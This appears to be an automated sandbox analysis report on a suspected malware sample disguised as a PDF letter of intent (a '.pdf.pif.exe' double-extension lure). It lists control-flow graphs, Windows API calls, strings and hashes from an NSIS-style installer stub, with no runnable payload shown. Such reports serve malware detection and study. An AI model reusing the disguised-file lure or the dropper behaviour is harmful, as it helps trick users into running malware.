ShowWindow 4549->4552 4553 403b1c 4549->4553 4554 403c4b SetClassLongW 4550->4554 4555 403fe1 SendMessageW 4551->4555 4604 403c0b 4551->4604 4552->4553 4556 403b24 DestroyWindow 4553->4556 4557 403b3e 4553->4557 4558 40140b 2 API calls 4554->4558 4602 403ccd 4555->4602 4563 403f1e 4556->4563 4560 403b43 SetWindowLongW 4557->4560 4561 403b54 4557->4561 4558->4547 4562 403c93 4559->4562 4560->4604 4566 403b60 GetDlgItem 4561->4566 4567 403bfd 4561->4567 4562->4551 4568 403c97 SendMessageW 4562->4568 4569 403f4f ShowWindow 4563->4569 4563->4604 4564 40140b 2 API calls 4564->4602 4565 403f20 DestroyWindow EndDialog 4565->4563 4570 403b90 4566->4570 4571 403b73 SendMessageW IsWindowEnabled 4566->4571 4572 403ffc 8 API calls 4567->4572 4568->4604 4569->4604 4574 403b9d 4570->4574 4575 403bb0 4570->4575 4576 403be4 SendMessageW 4570->4576 4584 403b95 4570->4584 4571->4570 4571->4604 4572->4604 4573 405d68 18 API calls 4573->4602 4574->4576 4574->4584 4578 403bb8 4575->4578 4579 403bcd 4575->4579 4576->4567 4577 403f6e SendMessageW 4580 403bcb 4577->4580 4581 40140b 2 API calls 4578->4581 4582 40140b 2 API calls 4579->4582 4580->4567 4581->4584 4585 403bd4 4582->4585 4583 403f95 19 API calls 4583->4602 4584->4577 4585->4567 4585->4584 4586 403f95 19 API calls 4587 403d48 GetDlgItem 4586->4587 4588 403d65 ShowWindow KiUserCallbackDispatcher 4587->4588 4589 403d5d 4587->4589 4612 403fb7 KiUserCallbackDispatcher 4588->4612 4589->4588 4591 403d8f EnableWindow 4594 403da3 4591->4594 4592 403da8 GetSystemMenu EnableMenuItem SendMessageW 4593 403dd8 SendMessageW 4592->4593 4592->4594 4593->4594 4594->4592 4613 403fca SendMessageW 4594->4613 4614 405d46 lstrcpynW 4594->4614 4597 403e06 lstrlenW 4598 405d68 18 API calls 4597->4598 4599 403e1c SetWindowTextW 4598->4599 4600 401389 2 API calls 4599->4600 4600->4602 4601 403e60 DestroyWindow 4601->4563 4603 403e7a CreateDialogParamW 4601->4603 4602->4564 4602->4565 4602->4573 4602->4583 4602->4586 4602->4601 4602->4604 4603->4563 4605 403ead 4603->4605 4606 403f95 19 API calls 4605->4606 4607 403eb8 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4606->4607 4608 401389 2 API calls 4607->4608 4609 403efe 4608->4609 4609->4604 4610 403f06 ShowWindow 4609->4610 4611 403fe1 SendMessageW 4610->4611 4611->4563 4612->4591 4613->4594 4614->4597 4630 40173f 4631 402ad0 18 API calls 4630->4631 4632 401746 4631->4632 4633 4059fe 2 API calls 4632->4633 4634 40174d 4633->4634 4635 4059fe 2 API calls 4634->4635 4635->4634 5282 4026bf 5283 4026c6 5282->5283 5284 40295d 5282->5284 5285 4026cc FindClose 5283->5285 5285->5284

                                                                                      Executed Functions

                                                                                      Function 004031DD Relevance: 73.8, APIs: 27, Strings: 15, Instructions: 335stringfilecomCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 4031dd-403273 #17 SetErrorMode OleInitialize call 4060b0 SHGetFileInfoW call 405d46 GetCommandLineW call 405d46 GetModuleHandleW 7 403275-40327c 0->7 8 40327d-40328f call 4057db CharNextW 0->8 7->8 11 403358-40335e 8->11 12 403294-40329a 11->12 13 403364 11->13 14 4032a3-4032a9 12->14 15 40329c-4032a1 12->15 16 403378-403392 GetTempPathW call 4031a9 13->16 17 4032b0-4032b4 14->17 18 4032ab-4032af 14->18 15->14 15->15 26 403394-4033b2 GetWindowsDirectoryW lstrcatW call 4031a9 16->26 27 4033ea-403404 DeleteFileW call 402cff 16->27 20 403349-403354 call 4057db 17->20 21 4032ba-4032c0 17->21 18->17 20->11 35 403356-403357 20->35 24 4032c2-4032c9 21->24 25 4032d5-4032ec 21->25 30 4032d0 24->30 31 4032cb-4032ce 24->31 32 40331a-403330 25->32 33 4032ee-403304 25->33 26->27 45 4033b4-4033e4 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4031a9 26->45 41 40349a-4034a9 call 403640 OleUninitialize 27->41 42 40340a-403410 27->42 30->25 31->25 31->30 32->20 39 403332-403347 32->39 33->32 37 403306-40330e 33->37 35->11 43 403310-403313 37->43 44 403315 37->44 39->20 40 403366-403373 call 405d46 39->40 40->16 57 4035a5-4035ab 41->57 58 4034af-4034bf call 405529 ExitProcess 41->58 46 403412-40341d call 4057db 42->46 47 40348a-403491 call 40371a 42->47 43->32 43->44 44->32 45->27 45->41 61 403454-40345e 46->61 62 40341f-403430 46->62 56 403496 47->56 56->41 59 403628-403630 57->59 60 4035ad-4035ca call 4060b0 * 3 57->60 66 403632 59->66 67 403636-40363a ExitProcess 59->67 92 403614-40361f ExitWindowsEx 60->92 93 4035cc-4035ce 60->93 68 403460-40346e call 4058b6 61->68 69 4034c5-4034df lstrcatW lstrcmpiW 61->69 65 403432-403434 62->65 72 403436-40344c 65->72 73 40344e-403452 65->73 66->67 68->41 80 403470-403486 call 405d46 * 2 68->80 69->41 75 4034e1-4034f7 CreateDirectoryW SetCurrentDirectoryW 69->75 72->61 72->73 73->61 73->65 76 403504-40352d call 405d46 75->76 77 4034f9-4034ff call 405d46 75->77 88 403532-40354e call 405d68 DeleteFileW 76->88 77->76 80->47 98 403550-403560 CopyFileW 88->98 99 40358f-403597 88->99 92->59 96 403621-403623 call 40140b 92->96 93->92 97 4035d0-4035d2 93->97 96->59 97->92 101 4035d4-4035e6 GetCurrentProcess 97->101 98->99 103 403562-403582 call 405be0 call 405d68 call 4054c8 98->103 99->88 102 403599-4035a0 call 405be0 99->102 101->92 107 4035e8-40360a 101->107 102->41 103->99 115 403584-40358b CloseHandle 103->115 107->92 115->99
                                                                                      APIs
                                                                                      • #17.COMCTL32 ref: 004031FC
                                                                                      • SetErrorMode.KERNELBASE(00008001), ref: 00403207
                                                                                      • OleInitialize.OLE32(00000000), ref: 0040320E
                                                                                        • Part of subcall function 004060B0: GetModuleHandleA.KERNEL32(?,?,00000020,00403220,00000008), ref: 004060C2
                                                                                        • Part of subcall function 004060B0: LoadLibraryA.KERNELBASE(?,?,00000020,00403220,00000008), ref: 004060CD
                                                                                        • Part of subcall function 004060B0: GetProcAddress.KERNEL32(00000000,?), ref: 004060DE
                                                                                      • SHGetFileInfoW.SHELL32(0042B1B8,00000000,?,000002B4,00000000), ref: 00403236
                                                                                        • Part of subcall function 00405D46: lstrcpynW.KERNEL32(?,?,00000400,0040324B,00433EA0,NSIS Error), ref: 00405D53
                                                                                      • GetCommandLineW.KERNEL32(00433EA0,NSIS Error), ref: 0040324B
                                                                                      • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe",00000000), ref: 0040325E
                                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe",00000020), ref: 00403285
                                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403389
                                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040339A
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033A6
                                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033BA
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033C2
                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004033D3
                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004033DB
                                                                                      • DeleteFileW.KERNELBASE(1033), ref: 004033EF
                                                                                      • OleUninitialize.OLE32(?), ref: 0040349F
                                                                                      • ExitProcess.KERNEL32 ref: 004034BF
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe",00000000,?), ref: 004034CB
                                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe",00000000,?), ref: 004034D7
                                                                                      • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004034E3
                                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004034EA
                                                                                      • DeleteFileW.KERNEL32(0042A9B8,0042A9B8,?,00435000,?), ref: 00403544
                                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe,0042A9B8,00000001), ref: 00403558
                                                                                      • CloseHandle.KERNEL32(00000000,0042A9B8,0042A9B8,?,0042A9B8,00000000), ref: 00403585
                                                                                      • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 004035DB
                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 00403617
                                                                                      • ExitProcess.KERNEL32 ref: 0040363A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                      • String ID: "C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright\Unsecludedly\Unpulverise$C:\Users\user\Desktop$C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                      • API String ID: 4107622049-2046466047
                                                                                      • Opcode ID: abc994cbbed28e5ab2df900e3bd2d261610db15ed8f53fee5a5c2c0b050c2c29
                                                                                      • Instruction ID: c3dce8018812ee6b76f8874dd062ed99eac1b1b1f1b1a27a2229326af738bb6a
                                                                                      • Opcode Fuzzy Hash: abc994cbbed28e5ab2df900e3bd2d261610db15ed8f53fee5a5c2c0b050c2c29
                                                                                      • Instruction Fuzzy Hash: 21B1C230500311AAD720BF619D49A2B3EACEF45746F11443FF442BA2E1DBBD9A45CB6E
                                                                                      Function 00405139 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 282windowclipboardmemoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 116 405139-405154 117 4052e5-4052ec 116->117 118 40515a-405223 GetDlgItem * 3 call 403fca call 404897 GetClientRect GetSystemMetrics SendMessageW * 2 116->118 120 405316-405323 117->120 121 4052ee-405310 GetDlgItem CreateThread CloseHandle 117->121 139 405241-405244 118->139 140 405225-40523f SendMessageW * 2 118->140 123 405341-405348 120->123 124 405325-40532b 120->124 121->120 128 40534a-405350 123->128 129 40539f-4053a3 123->129 126 405363-40536c call 403ffc 124->126 127 40532d-40533c ShowWindow * 2 call 403fca 124->127 136 405371-405375 126->136 127->123 133 405352-40535e call 403f6e 128->133 134 405378-405388 ShowWindow 128->134 129->126 131 4053a5-4053a8 129->131 131->126 141 4053aa-4053bd SendMessageW 131->141 133->126 137 405398-40539a call 403f6e 134->137 138 40538a-405393 call 404ffa 134->138 137->129 138->137 145 405254-40526b call 403f95 139->145 146 405246-405252 SendMessageW 139->146 140->139 147 4054c1-4054c3 141->147 148 4053c3-4053e4 CreatePopupMenu call 405d68 AppendMenuW 141->148 155 4052a1-4052c2 GetDlgItem SendMessageW 145->155 156 40526d-405281 ShowWindow 145->156 146->145 147->136 153 4053e6-4053f7 GetWindowRect 148->153 154 4053f9-4053ff 148->154 158 405402-40541a TrackPopupMenu 153->158 154->158 155->147 157 4052c8-4052e0 SendMessageW * 2 155->157 159 405290 156->159 160 405283-40528e ShowWindow 156->160 157->147 158->147 162 405420-405437 158->162 161 405296-40529c call 403fca 159->161 160->161 161->155 163 40543c-405457 SendMessageW 162->163 163->163 165 405459-40547c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 163->165 166 40547e-4054a5 SendMessageW 165->166 166->166 167 4054a7-4054bb GlobalUnlock SetClipboardData CloseClipboard 166->167 167->147
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,00000403), ref: 00405198
                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004051A7
                                                                                      • GetClientRect.USER32(?,?), ref: 004051E4
                                                                                      • GetSystemMetrics.USER32(00000015), ref: 004051EC
                                                                                      • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 0040520D
                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040521E
                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405231
                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040523F
                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405252
                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405274
                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405288
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004052A9
                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004052B9
                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052D2
                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052DE
                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 004051B6
                                                                                        • Part of subcall function 00403FCA: SendMessageW.USER32(00000028,?,00000001,00403DF6), ref: 00403FD8
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004052FB
                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000050CD,00000000), ref: 00405309
                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 00405310
                                                                                      • ShowWindow.USER32(00000000), ref: 00405334
                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405339
                                                                                      • ShowWindow.USER32(00000008), ref: 00405380
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B2
                                                                                      • CreatePopupMenu.USER32 ref: 004053C3
                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053D8
                                                                                      • GetWindowRect.USER32(?,?), ref: 004053EB
                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040540F
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040544A
                                                                                      • OpenClipboard.USER32(00000000), ref: 0040545A
                                                                                      • EmptyClipboard.USER32 ref: 00405460
                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040546C
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405476
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040548A
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004054AA
                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004054B5
                                                                                      • CloseClipboard.USER32 ref: 004054BB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                      • String ID: $@d${
                                                                                      • API String ID: 590372296-278268938
                                                                                      • Opcode ID: 6a257b260a3b0c83269dcddb951c3defeee43ec038cce651daa15833628ad7d2
                                                                                      • Instruction ID: 772e8fb2bc22c5523386e43e2fe12f7b772d85fac993704a731418f1505fe185
                                                                                      • Opcode Fuzzy Hash: 6a257b260a3b0c83269dcddb951c3defeee43ec038cce651daa15833628ad7d2
                                                                                      • Instruction Fuzzy Hash: A8A14871800609FFDB119F60DD89AAE7B79FF08355F00403AFA45BA1A0CBB59A51DF58
                                                                                      Function 00405D68 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207stringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 409 405d68-405d73 410 405d75-405d84 409->410 411 405d86-405d9c 409->411 410->411 412 405da2-405daf 411->412 413 405fb4-405fba 411->413 412->413 416 405db5-405dbc 412->416 414 405fc0-405fcb 413->414 415 405dc1-405dce 413->415 417 405fd6-405fd7 414->417 418 405fcd-405fd1 call 405d46 414->418 415->414 419 405dd4-405de0 415->419 416->413 418->417 420 405fa1 419->420 421 405de6-405e22 419->421 423 405fa3-405fad 420->423 424 405faf-405fb2 420->424 425 405f42-405f46 421->425 426 405e28-405e33 GetVersion 421->426 423->413 424->413 429 405f48-405f4c 425->429 430 405f7b-405f7f 425->430 427 405e35-405e39 426->427 428 405e4d 426->428 427->428 431 405e3b-405e3f 427->431 434 405e54-405e5b 428->434 432 405f5c-405f69 call 405d46 429->432 433 405f4e-405f5a call 405c8d 429->433 435 405f81-405f89 call 405d68 430->435 436 405f8e-405f9f lstrlenW 430->436 431->428 437 405e41-405e45 431->437 447 405f6e-405f77 432->447 433->447 439 405e60-405e62 434->439 440 405e5d-405e5f 434->440 435->436 436->413 437->428 443 405e47-405e4b 437->443 445 405e64-405e81 call 405c13 439->445 446 405e9e-405ea1 439->446 440->439 443->434 455 405e86-405e8a 445->455 448 405eb1-405eb4 446->448 449 405ea3-405eaf GetSystemDirectoryW 446->449 447->436 451 405f79 447->451 453 405eb6-405ec4 GetWindowsDirectoryW 448->453 454 405f1f-405f21 448->454 452 405f23-405f27 449->452 456 405f3a-405f40 call 405fda 451->456 452->456 460 405f29-405f2d 452->460 453->454 454->452 458 405ec6-405ed0 454->458 459 405e90-405e99 call 405d68 455->459 455->460 456->436 462 405ed2-405ed5 458->462 463 405eea-405f00 SHGetSpecialFolderLocation 458->463 459->452 460->456 465 405f2f-405f35 lstrcatW 460->465 462->463 466 405ed7-405ede 462->466 467 405f02-405f19 SHGetPathFromIDListW CoTaskMemFree 463->467 468 405f1b 463->468 465->456 470 405ee6-405ee8 466->470 467->452 467->468 468->454 470->452 470->463
                                                                                      APIs
                                                                                      • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,?,00405031,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000000,00000000,0041D5A8), ref: 00405E2B
                                                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00405EA9
                                                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00405EBC
                                                                                      • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405EF8
                                                                                      • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00405F06
                                                                                      • CoTaskMemFree.OLE32(?), ref: 00405F11
                                                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F35
                                                                                      • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,?,00405031,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000000,00000000,0041D5A8), ref: 00405F8F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                      • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                      • API String ID: 900638850-3648785384
                                                                                      • Opcode ID: fb6d2cc1d22cfc09ac6e86381d9ee61035175854fb92f405448deba68890e7a8
                                                                                      • Instruction ID: b81ff5d6b4e7f68ebbf9f5a60334f295c7cfdbca171d810927ba552bda20cf23
                                                                                      • Opcode Fuzzy Hash: fb6d2cc1d22cfc09ac6e86381d9ee61035175854fb92f405448deba68890e7a8
                                                                                      • Instruction Fuzzy Hash: E761C071A00906ABDF209F25CD45AAF37A5EF55314F14803BE585BA2E0D77D8A82CF8D
                                                                                      Function 004055D5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 658 4055d5-4055fb call 4058b6 661 405614-40561b 658->661 662 4055fd-40560f DeleteFileW 658->662 663 40561d-40561f 661->663 664 40562e-40563e call 405d46 661->664 665 4057a7-4057ab 662->665 666 405755-40575a 663->666 667 405625-405628 663->667 671 405640-40564b lstrcatW 664->671 672 40564d-40564e call 4057fa 664->672 666->665 670 40575c-40575f 666->670 667->664 667->666 673 405761-405767 670->673 674 405769-405771 call 406089 670->674 676 405653-405657 671->676 672->676 673->665 674->665 681 405773-405787 call 4057ae call 40558d 674->681 679 405663-405669 lstrcatW 676->679 680 405659-405661 676->680 682 40566e-40568b lstrlenW FindFirstFileW 679->682 680->679 680->682 697 405789-40578c 681->697 698 40579f-4057a2 call 404ffa 681->698 684 405691-4056aa call 4057db 682->684 685 40574a-40574e 682->685 692 4056b5-4056b9 684->692 693 4056ac-4056b0 684->693 685->666 687 405750 685->687 687->666 695 4056d0-4056de call 405d46 692->695 696 4056bb-4056c2 692->696 693->692 694 4056b2 693->694 694->692 708 4056e0-4056e8 695->708 709 4056f5-405700 call 40558d 695->709 699 4056c4-4056c8 696->699 700 405729-40573b FindNextFileW 696->700 697->673 702 40578e-40579d call 404ffa call 405be0 697->702 698->665 699->695 704 4056ca-4056ce 699->704 700->684 706 405741-405744 FindClose 700->706 702->665 704->695 704->700 706->685 708->700 711 4056ea-4056f3 call 4055d5 708->711 718 405721-405724 call 404ffa 709->718 719 405702-405705 709->719 711->700 718->700 720 405707-405717 call 404ffa call 405be0 719->720 721 405719-40571f 719->721 720->700 721->700
                                                                                      APIs
                                                                                      • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"), ref: 004055FE
                                                                                      • lstrcatW.KERNEL32(0042F200,\*.*,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"), ref: 00405646
                                                                                      • lstrcatW.KERNEL32(?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"), ref: 00405669
                                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"), ref: 0040566F
                                                                                      • FindFirstFileW.KERNEL32(0042F200,?,?,?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"), ref: 0040567F
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,?,?,0000003F), ref: 00405733
                                                                                      • FindClose.KERNEL32(00000000), ref: 00405744
                                                                                      Strings
                                                                                      • "C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe", xrefs: 004055DE
                                                                                      • \*.*, xrefs: 00405640
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004055E3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
